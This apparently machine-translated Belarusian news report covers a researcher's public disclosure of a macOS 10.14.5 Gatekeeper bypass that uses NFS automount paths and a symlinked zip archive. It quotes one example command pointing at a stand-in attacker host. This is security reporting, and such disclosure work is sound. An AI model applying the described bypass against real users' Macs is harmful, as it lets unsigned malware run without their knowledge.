Амая Томан Даследчык бяспекі Філіпа Каваларын апублікаваў у сваім блогу папярэджанне аб памылцы ў macOS 10.14.5. Гэта заключаецца ў магчымасці поўнага абыходу мер бяспекі Gatekeeper. Па словах Кавалларина, ён паказаў на памылку Apple яшчэ ў лютым гэтага года, але кампанія не выправіла яе ў апошнім абнаўленні.
Gatekeeper быў распрацаваны Apple і ўпершыню ўключаны ў яе настольную аперацыйную сістэму ў 2012 годзе. Гэта механізм, які прадухіляе запуск прыкладання без ведама і згоды карыстальніка. Пасля таго, як вы спампавалі праграму, Gatekeeper аўтаматычна правярае яе код, каб даведацца, ці правільна праграмнае забеспячэнне падпісана Apple.
Гэта можа быць зацікавіць вас
У сваім паведамленні ў блогу Каваларын адзначае, што Gatekeeper па змаўчанні разглядае як знешняе сховішча, так і сеткавыя агульныя рэсурсы як бяспечныя месцы. Такім чынам, любое прыкладанне, якое знаходзіцца ў гэтых мэтах, можа быць аўтаматычна запушчана без неабходнасці праходжання праверкі Gatekeeper. Менавіта гэтая функцыя можа быць выкарыстана для запуску шкоднаснага праграмнага забеспячэння без ведама карыстальніка.
Адным з аспектаў, які дазваляе несанкцыянаваны доступ, з'яўляецца функцыя аўтаматычнага мантавання, якая дазваляе карыстальнікам аўтаматычна мантаваць сеткавы агульны доступ, проста ўказаўшы шлях, які пачынаецца з "/net/". У якасці прыкладу Каваларын прыводзіць шлях «ls /net/evil-attacker.com/sharedfolder/», які можа прымусіць аперацыйную сістэму загрузіць змесціва папкі «sharedfolder» у аддаленым месцы, што можа быць патэнцыйна шкоднасным.
Пра тое, як дзейнічае пагроза, можна паглядзець на відэа:
Іншым фактарам з'яўляецца той факт, што калі архіў zip, які змяшчае пэўную сімвалічную спасылку, якая вядзе да функцыі аўтаматычнага мантавання, абагульваецца, ён не будзе правярацца Gatekeeper. Такім чынам, ахвяра можа лёгка загрузіць шкоднасны архіў і распакаваць яго, дазваляючы зламысніку запускаць практычна любое праграмнае забеспячэнне на Mac без ведама карыстальніка. Finder, які хавае некаторыя пашырэнні па змаўчанні, таксама мае сваю долю гэтай уразлівасці.
Кавалларин у сваім блогу заяўляе, што Apple звярнула ўвагу на ўразлівасць аперацыйнай сістэмы macOS 22 лютага гэтага года. Але ў сярэдзіне мая Apple спыніла сувязь з Cavallarin, таму Cavallarin вырашыў абнародаваць усё.
крыніца: FCVL
